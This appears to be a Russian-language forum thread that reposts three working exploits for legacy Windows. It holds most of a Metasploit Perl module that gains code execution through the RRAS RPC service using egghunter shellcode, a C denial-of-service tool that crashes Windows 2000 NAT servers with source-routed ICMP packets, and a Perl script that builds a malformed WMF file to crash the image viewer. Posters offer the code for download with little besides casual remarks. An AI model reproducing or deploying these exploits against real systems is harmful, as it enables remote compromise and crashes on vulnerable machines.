  [ 'Windows 2000',   0x750217ae ], # call esi
   ],

	'Keys' => ['rras'],

	'DisclosureDate' => 'Jun 13 2006',
  };

# Constructor: hand the module metadata and advanced options to the
# Msf::Exploit base class. @_ is forwarded untouched, so it still carries the
# invocant as its first element exactly as in the original call.
sub new {
my ($class) = @_;
return $class->SUPER::new( { Advanced => $advanced, Info => $info }, @_ );
}

# Bind to the RRAS endpoint over the configured SMB pipe, resolve 'Automatic'
# to the Windows 2000 target from the OS string the SMB peer reports, build
# the opnum 0x0A stub and send it twice (per the comments below: first to
# create the registry key, then to trigger the overwrite). Returns nothing;
# progress goes through $self->PrintLine.
#
# Review notes (code left as found):
#  - $target is declared with 'my' twice; the second masks the first.
#  - $target_port, $FragSize, $res, $rpc and $pattern are never used.
#  - @response is declared with 'my' twice in the same scope; the reply to
#    the first request is discarded without being inspected.
#  - The XP branch of the auto-detection is commented out while 'Description'
#    still tells the operator how to set SMBPIPE for XP SP1, and 'Targets'
#    lists only Windows 2000.
sub Exploit {
	my ($self)      = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];

	my $FragSize = $self->GetVar('FragSize') || 256;
	my $target   = $self->Targets->[$target_idx];   # second 'my $target' (see notes above)

	my ( $res, $rpc );

	my $pipe    = "\\" . $self->GetVar("SMBPIPE");
	my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
	my $version = '1.0';

	my $handle =
   Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
  $pipe );

	# SMB credentials and the advanced options all come from GetVar().
	my $dce = Pex::DCERPC->new(
  'handle'      => $handle,
  'username'    => $self->GetVar('SMBUSER'),
  'password'    => $self->GetVar('SMBPASS'),
  'domain'      => $self->GetVar('SMBDOM'),
  'fragsize'    => $self->GetVar('FragSize'),
  'bindevasion' => $self->GetVar('BindEvasion'),
  'directsmb'   => $self->GetVar('DirectSMB'),
   );

	if ( !$dce ) {
  $self->PrintLine("[*] Could not bind to $handle");
  return;
	}

	# 'Automatic' is resolved from the native-OS string the SMB peer advertised;
	# only 'Windows 5.0' is accepted, everything else returns.
	my $smb = $dce->{'_handles'}{$handle}{'connection'};
	if ( $target->[0] =~ /Auto/ ) {
  if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
  	$target = $self->Targets->[1];
  	$self->PrintLine('[*] Detected a Windows 2000 target...');
  }
  #elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
  #	$target = $self->Targets->[2];
  #	$self->PrintLine('[*] Detected a Windows XP target...');
  #}
  else {
  	$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
  	return;
  }
	}

	# Shiny new egghunt from the 3.0 code :-)
	my $egghunt =
   "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
   "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
   "\x41\x41\x41\x41".
   "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

	# Pick a "filler" character that we know doesn't get mangled
	# by the wide string conversion routines
	my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7";
	my $filler  = substr($fillset, rand(length($fillset)), 1);
	my $eggtag  = '';
	my $pattern = '';   # NOTE(review): never used in this sub

	# Four random bytes drawn from the same filler set.
	while (length($eggtag) < 4) {
  $eggtag .= substr($fillset, rand(length($fillset)), 1);
	}

	# Configure the egg
	substr($egghunt, 0x12, 4, $eggtag);

	# We use an egghunter to give us nearly unlimited room for shellcode
	my $eggdata =
   ($filler x 1024).
   $eggtag.
   $eggtag.
   $shellcode.
   ($filler x 1024);

	# Mini-payload that launches the egghunt
	my $bof = $filler x 178;
	substr($bof, 84, length($egghunt), $egghunt);

	# Base pointer override occurs with this string
	my $pat =
   ($filler x 886).
   pack('V', $target->[1]).
   ($filler x 3). "\xc0".
   $bof;

	# The vulnerability is triggered with the second field of this structure
	my $type2 =
   Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ).
   Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ).
   Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ).
   Pex::NDR::Long( int(rand(0xffffffff)) ).
   Pex::NDR::Long( int(rand(0xffffffff)) );

	# Another gigantic structure, many of these fields up as registry values
	my $type1 =
   Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial
   Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber
   Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation
   Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights
   Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus
   Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial
   Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits
   Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits
   Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete
   Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard
   Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts
   Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds
   Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds
   Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure
   Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing
   Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery
   Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode
   Pex::NDR::Long(0x45).
   $type2.
   Pex::NDR::UnicodeConformantVaryingString("\x00" x 129).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
   Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::UnicodeConformantVaryingString("\x00" x 514).
   Pex::NDR::Long(int(rand(0xffffffff))).
   Pex::NDR::Long(int(rand(0xffffffff)));

	# Create the actual RPC stub and tack our payload on the end
	my $stub =
   $type1.
   Pex::NDR::Long(int(rand(0xffffffff))).
   $eggdata;

	# The same stub is sent twice to opnum 0x0A; only the second reply is examined.
	$self->PrintLine("[*] Creating the malicious registry key...");
	my @response = $dce->request( $handle, 0x0A, $stub );

	$self->PrintLine("[*] Triggering the base pointer overwrite...");
	my @response = $dce->request( $handle, 0x0A, $stub );   # second 'my @response' (see notes above)

	# Any reply is printed and read as "the request was handled normally".
	if (@response) {
  $self->PrintLine('[*] RPC server responded with:');
  foreach my $line (@response) {
  	$self->PrintLine( '[*] ' . $line );
  }
  $self->PrintLine('[*] This probably means that the system is patched');
	}
	return;
}

1;
Слив:
:zns5: Скачать|Download
 
и ещё один.
MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit
Эксплоит:
Код:
/*

####################################
# 
# Windows TCP/IP source routing poc
# C version...
#
# by Preddy
#
# RootShell Security Group
#
# Shoutz 2: 
#
#  Jimmy and ByteCoder + 
#  Rs Crew + 
#  Rest of the world :D
#
#
####################################

Compile:

gcc win-tcpip-dos.c -o wintcpipdos

Info:

Published:     
14.06.2006
Source:        ANDREYMINAEV
Type:          remote
Level:         9/10

Buffer overflow on ICMP packets with Loose Source and Record Route IP options. 
Short message translation: There are DoS conditions in the Windows 2000 built-in NAT 
server. Tested configuration: Windows 2000 English Standard/Advanced Service Pack 4 
+ Update Rollup 1 for Service Pack 4 with NAT server enabled. While routing packets 
with the "Loose Source and Record Route" option defined by RFC 791 through the server, Windows 
crashes to a BSOD with an error in tcpip.sys or ntoskrnl.exe, or the system hangs or 
becomes unstable. It doesn't matter whether the packets come from internal or external 
networks. Use the attached script to test for the vulnerability. On Windows 2003 the problem 
is not present. The same problem is also likely present in Windows 2000 + 
ISA 2000. Code execution is potentially possible.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Entry point. argv[1] is the address handed to the local ping/traceroute
 * commands, argv[2] ("linux" or "windows") picks which command flavour is
 * spawned through system(). Exits with 1 on a usage error; once one of the
 * while(1) loops is entered it never returns; for any other argv[2] it falls
 * off the end without a return statement.
 *
 * Review notes (code left as found):
 *  - strcpy(mysystem, argv[2]) is unbounded into a 10-byte array, and
 *    strcpy(dos_ip, argv[1]) into a 255-byte one: long arguments overflow
 *    this program's own stack before anything is sent.
 *  - strncat(..., argv[1], 9) appends at most 9 characters of argv[1], so the
 *    address inside the spawned command may be truncated; dos_ip itself is
 *    only ever printed.
 *  - The assembled command strings are passed to system(), i.e. interpreted
 *    by a shell.
 *  - main() relies on implicit int, and the "Uses the ping..." printf passes
 *    argv[0] with no matching conversion.
 */
main(int argc, char *argv[])
{

char dos_ip[255];
char mysystem[10];
char ping[20+1];
char trace[100];

if(argc != 3)
{

printf("\n\nWindows TCP/IP source routing Dos - by Preddy\n");
printf("Usage: %s <ip> <mysystem>\n", argv[0]);
printf("Example: %s 127.0.0.1 linux\n", argv[0]);
printf("Uses the ping and the traceroute utility on your system\n", argv[0]);
printf("Should cause a BSOD on the remote system\n");
printf("More info: http://www.security.nnov.ru/Fnews753.html\n\n");
exit(1);
}

/* Unbounded copies from argv (see review notes above). */
strcpy(dos_ip, argv[1]);
strcpy(mysystem, argv[2]);

if((strcmp (argv[2],"linux"))==0)
{

printf("\nTarget: %s\n", dos_ip);
printf("MySystem: %s\n", mysystem);
printf("Sending Payload...\n\n");

/* ping[] is 21 bytes: 10-byte prefix + at most 9 appended + NUL. */
strcpy(ping, "ping -c 1 ");
strncat(ping,argv[1],9);
strcpy(trace, "traceroute -m 1 -g 0.0.0.0 ");
strncat(trace,argv[1],9);


/* No exit condition: runs until the process is killed. */
while(1)
{

system(trace);
system(ping);
}

}

if((strcmp (argv[2],"windows"))== 0)
{

printf("Target: %s\n", dos_ip);
printf("MySystem: %s\n", mysystem);
printf("Sending Payload...\n");

strcpy(ping, "ping -n 1 ");
strncat(ping,argv[1],9);

strcpy(trace, "tracert -h 1 -j 0.0.0.0 ");
strncat(trace,argv[1],9);

/* No exit condition: runs until the process is killed. */
while(1)
{
system(trace);
system(ping);
}

}

}
 
В следующий раз выкладывайте, пожалуйста, в виде *.txt файла для скачивания или перенаправления на другую страницу, а то эту тему долго листать. :huh:
[mod][Ŧ1LAN:] ок, если большие будут.[/mod]
 
MS Windows WMF-bug denial of service exploit
Код:
#!/usr/bin/perl
# Writes a fixed, hand-crafted 68-byte record stream to ./brush.wmf in the
# current directory; the bytes are emitted verbatim, nothing is computed.
#
# Review notes (code left as found): only open() is checked. The return
# values of the print WMF calls and of close(WMF) are ignored, so a short or
# failed write (e.g. a full disk) still ends with "ok".

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
Как говорится, старая сказка на новый лад...
Сей перловый скрипт генерирует wmf-файл. Стандартный виндовый просмотрщик изображений вылетает нафиг :)
 

